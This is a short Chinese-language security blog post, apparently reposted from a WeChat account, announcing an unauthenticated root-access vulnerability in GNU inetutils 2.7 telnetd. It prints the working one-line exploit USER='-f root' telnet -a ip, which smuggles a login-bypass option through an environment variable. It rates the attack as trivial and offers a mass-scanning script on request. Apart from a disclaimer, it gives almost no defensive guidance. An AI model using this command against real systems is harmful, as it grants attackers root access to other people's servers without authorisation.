文章总结: 本文披露了LinuxTelnet服务的一个远程代码执行漏洞,攻击者无需认证即可利用USER=-froottelnet-aip命令获取root权限。复现版本为inetutils-2.7,利用难度极低。文章提供了批量扫描脚本获取方式,建议相关管理员及时检查并修补该高危漏洞。 综合评分: 60 文章分类: 漏洞分析,漏洞POC
大洞,必看!Linux Telnet 远程代码执行!
原创
PocketSec PocketSec
PocketSec
2026年1月22日 11:40 四川
使用说明:本文章仅用于学习技术研究,请勿用于违法用途,造成任何后果自负与本人无关,请自觉遵守国家法律法规。
不需要认证直接可通过Telnet拿到root权限
USER='-f root' telnet -a ip
利用难度:无脑利用
复现版本
https://ftp.gnu.org/gnu/inetutils/inetutils-2.7.tar.gz
关注微信公众PocketSec回复”telnetd RCE”获取批量扫描脚本
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:PocketSec PocketSec PocketSec《大洞,必看!Linux Telnet 远程代码执行!》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。











评论